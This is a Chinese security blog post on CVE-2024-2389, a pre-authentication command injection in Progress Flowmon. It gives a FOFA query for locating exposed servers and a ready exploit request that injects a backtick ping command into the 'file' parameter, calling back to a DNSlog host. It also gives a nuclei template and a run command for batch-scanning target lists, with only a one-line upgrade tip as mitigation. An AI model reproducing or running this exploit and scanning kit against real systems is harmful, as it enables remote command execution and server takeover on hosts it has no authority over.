CVE-2024-2389

admin 2024年4月17日17:33:58评论48 views字数 1252阅读4分10秒阅读模式

使

01

漏洞名称

Progress Flowmon 命令注入漏洞

02

漏洞影响

Progress Flowmon 11.X 12.x版本

CVE-2024-2389

03

漏洞描述

Progress Flowmon 是一个网络性能监控工具平台。2024年4月互联网上披露其存在前台命令注入漏洞,攻击者可利用该漏洞执行任意命令,控制服务器。

04

FOFA搜索语句
body="Flowmon-Web-Interface"

CVE-2024-2389

05

漏洞复现

向靶场发送如下数据包,其中ping+dnslog地址需要修改成自己dnslog地址

GET /service.pdfs/confluence?lang=en&file=`ping+dnslog地址` HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Safari/605.1.15Connection: closeAccept: */*Accept-Language: enAccept-Encoding: gzip

CVE-2024-2389

漏洞复现成功

06

批量扫描 poc

nuclei poc文件内容如下

id: CVE-2024-2389info:  name: Progress Flowmon 命令注入漏洞  author: fgz  severity: high  description: |    Progress Flowmon 是一个网络性能监控工具平台。2024年4月互联网上披露其存在前台命令注入漏洞,攻击者可利用该漏洞执行任意命令,控制服务器。  reference:    - https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability  metadata:    verified: true    fofa-query: body="Flowmon-Web-Interface"  tags: cve,cve2024,rcehttp:  - method: GET    path:      - "{{BaseURL}}/service.pdfs/confluence?lang=en&file=`ping+{{interactsh-url}}`"    matchers:      - type: dsl        dsl:          - contains(interactsh_protocol, "dns")        condition: and

运行POC

nuclei.exe -t mypoc/cve/CVE-2024-2389.yaml -l data1.txt

CVE-2024-2389

07

修复建议

升级到最新版本。

原文始发于微信公众号(AI与网安):CVE-2024-2389

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月17日17:33:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-2389http://cn-sec.com/archives/2665714.html

发表评论

匿名网友 填写信息